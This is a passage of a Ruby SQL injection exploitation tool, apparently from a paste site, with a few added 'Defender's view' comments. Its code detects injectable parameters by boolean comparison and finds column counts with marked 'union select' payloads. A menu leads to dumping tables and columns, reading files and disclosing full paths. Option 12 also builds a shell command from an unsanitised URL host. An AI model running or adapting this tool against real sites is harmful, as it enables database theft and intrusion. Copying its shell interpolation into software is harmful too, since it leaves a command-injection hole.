    when "8"
      print "\n\n[+] Table : "
      table = gets.chomp
      print "\n\n[+] Column 1 : "
      col1 = gets.chomp
      print "\n\n[+] Column 2 : "
      col2 = gets.chomp
      dumper(url,by,table,col1,col2)
      retorno(url,by)
    when "9"
      fuzzfile(url,by)
      retorno(url,by)
    when "10"
      print "\n\n[+] File : "
      file = gets.chomp
      abrirfile(url,by,file)
      retorno(url,by)
    when "11"
      print "\n\n[Full Source Discloure] : "
      full = gets.chomp
      print "\n\n[Directory to test] : "
      dir = gets.chomp
      into(url,by,full,dir)
      retorno(url,by)
    when "12"
      # The log path is interpolated into a shell command line ("start" is
      # the Windows shell's open-with-default-program command).
      log_path = "logs_webs/"+URI.parse(url).host+".txt"
      system("start #{log_path}")
      retorno(url,by)
    when "13"
      inicio()
    when "14"
      copyright()
    else
      retorno(url,by)
    end
  end
  455.  
  # Work out how many columns the page's query returns and which of them is
  # echoed in the response. For each candidate width from 2 to 25 it sends
  # a "union select" whose every position is its own number wrapped in
  # K0BRA markers; the first number that shows up in the response is
  # replaced by the "hackman" placeholder in the plain number list, the
  # resulting URL is logged, and control passes to the main menu.
  #
  # Defender's view: the log signature is up to 24 consecutive requests to
  # one endpoint with "and 1=0 union select" and a select list that grows
  # by one item each time. With parameterised queries the appended text is
  # treated as data and none of the requests change the page.
  def findlength(url,by)
   pass1,pass2 = bypass(by)
   # z: plain column list; x: the same list with every item marker-wrapped.
   z = "1"
   x = "concat(0x4b30425241,1,0x4b30425241)"
   for num in ('2'..'25')
     z = z+","+num
     x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
     code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
     if code=~/K0BRA(.*?)K0BRA/
       print "[+] The Page has "+num+" columns\n"
       print "[+] The number "+$1+" print data"
       z = z.sub($1,"hackman")
       sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
       savefile(url,"[+] SQLI : "+sqli)
       savefile(url,"[+] Bypass : "+by+"\n")
       central(sqli,by)
     end
   end
  end
  475.  
  # Decide whether +page+ looks injectable by fetching it twice, once with
  # "and 1=0" and once with "and 1=1" appended, and comparing the two
  # response bodies for inequality. A difference is reported as
  # "Vulnerable" and leads to findlength; otherwise the operator is asked
  # whether to continue anyway.
  #
  # Defender's view: the comparison is a plain string inequality, so any
  # page content that varies between two requests also counts as a
  # difference. When the parameter is bound through a parameterised query,
  # both variants are the same (invalid) value to the application.
  def testvul(page,by)
   pass1,pass2 = bypass(by)
   print "\n\n[+] Testing vulnerability ...\n\n"
   codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
   codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
   if codeuno != codedos
     print "[+] Vulnerable !\n"
     findlength(page,by)
   else
     print "[-] Not vulnerable\n"
     print "\n\n[+] Scan anyway y/n : "
     op = gets.chomp
     if op == "y"
       findlength(page,by)
   else
     volverinicio()
   end
  end  
  end
  495.  
  # First prompt: ask for the page URL and the bypass mode. A URL that
  # already contains the "hackman" placeholder goes straight to the main
  # menu; any other URL is handed to testvul first.
  def inicio()
    clean()
    head()
    print "\n\n[+] Page : "
    target = gets.chomp
    print "\n\n[+] Bypass : "
    mode = gets.chomp
    return central(target,mode) if target=~/hackman/
    testvul(target,mode)
  end
  509.  
  510. installer()
  511. inicio()
  512.  
  513. # The End ?
  514.  